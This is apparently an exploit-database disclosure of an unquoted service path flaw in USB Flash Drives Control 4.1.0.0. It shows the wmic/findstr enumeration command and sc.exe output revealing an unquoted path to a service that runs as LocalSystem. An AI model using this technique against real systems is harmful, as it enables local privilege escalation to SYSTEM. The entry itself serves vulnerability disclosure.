12f9039552
2 changes to exploits/shellcodes/ghdb Apache 2.4.x - Buffer Overflow Yahoo User Interface library (YUI2) TreeView v2.8.2 - Multiple Reflected Cross Site Scripting (XSS) USB Flash Drives Control 4.1.0.0 - Unquoted Service Path
36 lines
No EOL
1.2 KiB
Text
36 lines
No EOL
1.2 KiB
Text
# Exploit Title: USB Flash Drives Control 4.1.0.0 - Unquoted Service Path
|
|
# Date: 2023-31-05
|
|
# Exploit Author: Jeffrey Bencteux
|
|
# Vendor Homepage: https://binisoft.org/
|
|
# Software Link: https://binisoft.org/wfc
|
|
# Version: 4.1.0.0
|
|
# Tested on: Microsoft Windows 11 Pro
|
|
# Vulnerability Type: Unquoted Service Path
|
|
|
|
PS C:\> wmic service get name,displayname,pathname,startmode |findstr /i
|
|
"auto" |findstr /i /v "c:\windows"
|
|
USB Flash Drives Control usbcs C:\Program Files\USB Flash
|
|
Drives Control\usbcs.exe Auto
|
|
|
|
PS C:\> sc.exe qc usbcs
|
|
[SC] QueryServiceConfig SUCCESS
|
|
|
|
SERVICE_NAME: usbcs
|
|
TYPE : 10 WIN32_OWN_PROCESS
|
|
START_TYPE : 2 AUTO_START
|
|
ERROR_CONTROL : 1 NORMAL
|
|
BINARY_PATH_NAME : C:\Program Files\USB Flash Drives
|
|
Control\usbcs.exe
|
|
LOAD_ORDER_GROUP :
|
|
TAG : 0
|
|
DISPLAY_NAME : USB Flash Drives Control
|
|
DEPENDENCIES :
|
|
SERVICE_START_NAME : LocalSystem
|
|
|
|
PS C:\> systeminfo
|
|
OS Name: Microsoft Windows 11 Pro
|
|
OS Version: 10.0.22621 N/A Build 22621
|
|
OS Manufacturer: Microsoft Corporation
|
|
|
|
--
|
|
Jeffrey BENCTEUX |